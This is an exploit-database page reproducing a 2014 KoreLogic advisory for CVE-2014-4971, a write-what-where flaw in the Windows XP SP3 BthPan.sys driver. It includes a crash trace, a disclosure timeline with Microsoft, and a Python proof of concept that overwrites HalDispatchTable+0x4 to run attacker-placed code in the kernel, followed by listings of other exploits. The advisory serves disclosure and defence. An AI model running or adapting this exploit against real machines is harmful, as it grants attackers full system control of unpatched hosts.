Menu

Search for hundreds of thousands of exploits

"Microsoft Windows XP SP3 - 'BthPan.sys' Arbitrary Write Privilege Escalation"

Author

Exploit author

KoreLogic

Platform

Exploit platform

windows

Release date

Exploit published date

2014-07-21

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
"""
Title: Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
Advisory ID: KL-001-2014-002
Publication Date: 2014-07-18
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2014-002.txt


1. Vulnerability Details

     Affected Vendor: Microsoft
     Affected Product: Bluetooth Personal Area Networking
     Affected Versions: 5.1.2600.5512
     Platform: Microsoft Windows XP SP3
     CWE Classification: CWE-123: Write-what-where Condition
     Impact: Privilege Escalation
     Attack vector: IOCTL
     CVE ID: CVE-2014-4971

2. Vulnerability Description

     A vulnerability within the BthPan module allows an attacker to
     inject memory they control into an arbitrary location they
     define. This can be used by an attacker to overwrite
     HalDispatchTable+0x4 and execute arbitrary code by subsequently
     calling NtQueryIntervalProfile.

3. Technical Description

     A userland process can create a handle into the BthPan device
     and subsequently make DeviceIoControlFile() calls into that
     device. During the IRP handler routine for 0x0012b814 the user
     provided OutputBuffer address is not validated. This allows an
     attacker to specify an arbitrary address and write
     (or overwrite) the memory residing at the specified address.
     This is classicaly known as a write-what-where vulnerability and
     has well known exploitation methods associated with it.

     A stack trace from our fuzzing can be seen below. In our fuzzing
     testcase, the specified OutputBuffer in the DeviceIoControlFile()
     call is 0xffff0000.

STACK_TEXT:
b1e065b8 8051cc7f 00000050 ffff0000 00000001 nt!KeBugCheckEx+0x1b
b1e06618 805405d4 00000001 ffff0000 00000000 nt!MmAccessFault+0x8e7
b1e06618 804f3b76 00000001 ffff0000 00000000 nt!KiTrap0E+0xcc
b1e066e8 804fdaf1 8216cc80 b1e06734 b1e06728 nt!IopCompleteRequest+0x92
b1e06738 80541890 00000000 00000000 00000000 nt!KiDeliverApc+0xb3
b1e06758 804fb4a7 8055b1c0 81bdeda8 b1e0677c nt!KiUnlockDispatcherDatabase+0xa8
b1e06768 80534b09 8055b1c0 81f7a290 81f016b8 nt!KeInsertQueue+0x25
b1e0677c f83e26ec 81f7a290 00000000 b1e067a8 nt!ExQueueWorkItem+0x1b
b1e0678c b272b5a1 81f7a288 00000000 81e002d8 NDIS!NdisScheduleWorkItem+0x21
b1e067a8 b273a544 b1e067c8 b273a30e 8216cc40 bthpan!BthpanReqAdd+0x16b
b1e069e8 b273a62b 8216cc40 00000258 81e6f550 bthpan!IoctlDispatchDeviceControl+0x1a8
b1e06a00 f83e94bb 81e6f550 8216cc40 81d74d68 bthpan!IoctlDispatchMajor+0x93
b1e06a18 f83e9949 81e6f550 8216cc40 8217e6e8 NDIS!ndisDummyIrpHandler+0x48
b1e06ab4 804ee129 81e6f550 8216cc40 806d32d0 NDIS!ndisDeviceControlIrpHandler+0x5c
b1e06ac4 80574e56 8216ccb0 81d74d68 8216cc40 nt!IopfCallDriver+0x31
b1e06ad8 80575d11 81e6f550 8216cc40 81d74d68 nt!IopSynchronousServiceTail+0x70
b1e06b80 8056e57c 000006a8 00000000 00000000 nt!IopXxxControlFile+0x5e7
b1e06bb4 b1a2506f 000006a8 00000000 00000000 nt!NtDeviceIoControlFile+0x2a
WARNING: Stack unwind information not available. Following frames may be wrong.

     Reviewing the FOLLOWUP_IP value from the WinDBG '!analyze -v'
     command shows the fault originating in the bthpan driver.

FOLLOWUP_IP:
bthpan!BthpanReqAdd+16b
b272b5a1 ebc2            jmp     bthpan!BthpanReqAdd+0x12f (b272b565)

     Reviewing the TRAP_FRAME at the time of crash we can see
     IopCompleteRequest() copying data from InputBuffer into the
     OutputBuffer. InputBuffer is another parameter provided to the
     DeviceIoControlFile() function and is therefore controllable by
     the attacker. The edi register contains the invalid address
     provided during the fuzz testcase.

TRAP_FRAME:  b1e06630 -- (.trap 0xffffffffb1e06630)
ErrCode = 00000002
eax=0000006a ebx=8216cc40 ecx=0000001a edx=00000001 esi=81e002d8 edi=ffff0000
eip=804f3b76 esp=b1e066a4 ebp=b1e066e8 iopl=0         nv up ei pl nz na po cy
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010203
nt!IopCompleteRequest+0x92:
804f3b76 f3a5            rep movs dword ptr es:[edi],dword ptr [esi]

     A write-what-where vulnerability can be leveraged to obtain
     escalated privileges. To do so, an attacker will need to
     allocate memory in userland that is populated with shellcode
     designed to find the Token for PID 4 (System) and then overwrite
     the token for its own process. By leveraging the vulnerability
     in BthPan it is then possible to overwrite the pointer at
     HalDispatchTable+0x4 with a pointer to our shellcode. Calling
     NtQueryIntervalProfile() will subsequently call
     HalDispatchTable+0x4, execute our shellcode, and elevate the
     privilege of the exploit process.

4. Mitigation and Remediation Recommendation

     None. A patch is not likely to be forthcoming from the vendor.

5. Credit

     This vulnerability was discovered by Matt Bergin of KoreLogic
     Security, Inc.

6. Disclosure Timeline

   2014.04.28 - Initial contact; sent Microsoft report and PoC.
   2014.04.28 - Microsoft acknowledges receipt of vulnerability
                report; states XP is no longer supported and asks if
                the vulnerability affects other versions of Windows.
   2014.04.29 - KoreLogic asks Microsoft for clarification of their
                support policy for XP.
   2014.04.29 - Microsoft says XP-only vulnerabilities will not be
                addressed with patches.
   2014.04.29 - KoreLogic asks if Microsoft intends to address the
                vulnerability report.
   2014.04.29 - Microsoft opens case to investigate the impact of the
                vulnerability on non-XP systems.
   2014.05.06 - Microsoft asks again if this vulnerability affects
                non-XP systems.
   2014.05.14 - KoreLogic informs Microsoft that the vulnerability
                report is for XP and other Windows versions have not
                been examined.
   2014.06.11 - KoreLogic informs Microsoft that 30 business days have
                passed since vendor acknowledgement of the initial
                report.  KoreLogic requests CVE number for the
                vulnerability, if there is one. KoreLogic also
                requests vendor's public identifier for the
                vulnerability along with the expected disclosure date.
   2014.06.11 - Microsoft informs KoreLogic that the vulnerability
                does not impact any "up-platform" products. Says they
                are investigating embedded platforms. Does not provide
                CVE number.
   2014.06.24 - Microsoft contacts KoreLogic to say that they confused
                the report of this vulnerability with another and that
                they cannot reproduce the described behavior.
                Microsoft asks for an updated Proof-of-Concept, crash
                dumps or any further analysis of the vulnerability
                that KoreLogic can provide.
   2014.06.25 - KoreLogic provides Microsoft with an updated
                Proof-of-Concept which demonstrates using the
                vulnerability to spawn a system shell.
   2014.06.30 - KoreLogic asks Microsoft for confirmation of their
                receipt of the updated PoC. Also requests that a CVE
                ID be issued for this vulnerability.
   2014.07.02 - 45 business days have elapsed since Microsoft
                acknowledged receipt of the vulnerability report and
                PoC.
   2014.07.07 - KoreLogic requests CVE from MITRE.
   2014.07.18 - MITRE deems this vulnerability (KL-001-2014-002) to be
                identical to KL-001-2014-003 and issues CVE-2014-4971
                for both vulnerabilities.
   2014.07.18 - Public disclosure.

7. Proof of Concept
"""

#!/usr/bin/python2
#
# KL-001-2014-002 : Microsoft XP SP3 BthPan.sys Arbitrary Write Privilege Escalation
# Matt Bergin (KoreLogic / Smash the Stack) 
# CVE-2014-4971
#
from ctypes import *
from struct import pack
from os import getpid,system
from sys import exit
     EnumDeviceDrivers,GetDeviceDriverBaseNameA,CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory,LoadLibraryExA = windll.Psapi.EnumDeviceDrivers,windll.Psapi.GetDeviceDriverBaseNameA,windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory,windll.kernel32.LoadLibraryExA
     GetProcAddress,DeviceIoControlFile,NtQueryIntervalProfile,CloseHandle = windll.kernel32.GetProcAddress,windll.ntdll.ZwDeviceIoControlFile,windll.ntdll.NtQueryIntervalProfile,windll.kernel32.CloseHandle
     INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0
     
     # thanks to offsec for the concept
     # I re-wrote the code as to not fully insult them 
     def getBase(name=None):
     	retArray = c_ulong*1024
     	ImageBase = retArray()
     	callback = c_int(1024)
     	cbNeeded = c_long()
     	EnumDeviceDrivers(byref(ImageBase),callback,byref(cbNeeded))
     	for base in ImageBase:
     		driverName = c_char_p("\x00"*1024)
     		GetDeviceDriverBaseNameA(base,driverName,48)
     		if (name):
     			if (driverName.value.lower() == name):
     				return base
     		else:
     			return (base,driverName.value)
     	return None
     
     handle = CreateFileA("\\\\.\\BthPan",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None)
     if (handle == INVALID_HANDLE_VALUE):
	print "[!] Could not open handle to BthPan"
	exit(1)
     NtAllocateVirtualMemory(-1,byref(c_int(0x1)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40)
     buf = "\xcc\xcc\xcc\xcc"+"\x90"*0x400
     WriteProcessMemory(-1, 0x1, "\x90"*0x6000, 0x6000, byref(c_int(0)))
     WriteProcessMemory(-1, 0x1, buf, 0x400, byref(c_int(0)))
     kBase,kVer = getBase()
     hKernel = LoadLibraryExA(kVer,0,1)
     HalDispatchTable = GetProcAddress(hKernel,"HalDispatchTable")
     HalDispatchTable -= hKernel
     HalDispatchTable += kBase
     HalDispatchTable += 0x4
     DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x0012d814,0x1,0x258,HalDispatchTable,0)
     CloseHandle(handle)
     NtQueryIntervalProfile(c_ulong(2),byref(c_ulong()))
     exit(0)

"""
The contents of this advisory are copyright(c) 2014 KoreLogic, Inc.
and are licensed under a Creative Commons Attribution Share-Alike 4.0
(United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a proven
track record of providing security services to entities ranging from
Fortune 500 to small and mid-sized companies. We are a highly skilled
team of senior security consultants doing by-hand security assessments
for the most important networks in the U.S. and around the world. We
are also developers of various tools and resources aimed at helping
the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt
"""
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2018-11-14 "Dell OpenManage Network Manager 6.2.0.51 SP3 - Multiple Vulnerabilities" webapps linux KoreLogic
2018-06-27 "HPE VAN SDN 2.7.18.0503 - Remote Root" webapps linux KoreLogic
2018-03-05 "Sophos UTM 9.410 - 'loginuser' 'confd' Service Privilege Escalation" local linux KoreLogic
2017-03-10 "WatchGuard XTMv 11.12 Build 516911 - User Management Cross-Site Request Forgery" webapps xml KoreLogic
2016-11-07 "Sophos Web Appliance 4.2.1.3 - Remote Code Execution" webapps php KoreLogic
2016-10-05 "Cisco Firepower Threat Management Console 6.0.1 - Hard-Coded MySQL Credentials" local linux KoreLogic
2016-10-05 "Cisco Firepower Threat Management Console 6.0.1 - Local File Inclusion" webapps cgi KoreLogic
2016-10-05 "Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution" webapps cgi KoreLogic
2016-06-29 "Ubiquiti Administration Portal - Remote Command Execution (via Cross-Site Request Forgery)" webapps cgi KoreLogic
2015-09-17 "VBox Satellite Express 2.3.17.3 - Arbitrary Write" dos windows KoreLogic
2015-09-01 "XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write (PoC)" dos windows KoreLogic
2015-09-01 "SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where (PoC)" dos windows KoreLogic
2015-01-29 "Microsoft Windows Server 2003 SP2 - Local Privilege Escalation (MS14-070)" local windows KoreLogic
2014-11-06 "VMware Workstation 10.0.0.40273 - 'vmx86.sys' Arbitrary Kernel Read" dos windows_x86 KoreLogic
2014-07-21 "Microsoft Windows XP SP3 - 'BthPan.sys' Arbitrary Write Privilege Escalation" local windows KoreLogic
2014-07-19 "Microsoft Windows XP SP3 - 'MQAC.sys' Arbitrary Write Privilege Escalation" local windows KoreLogic
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.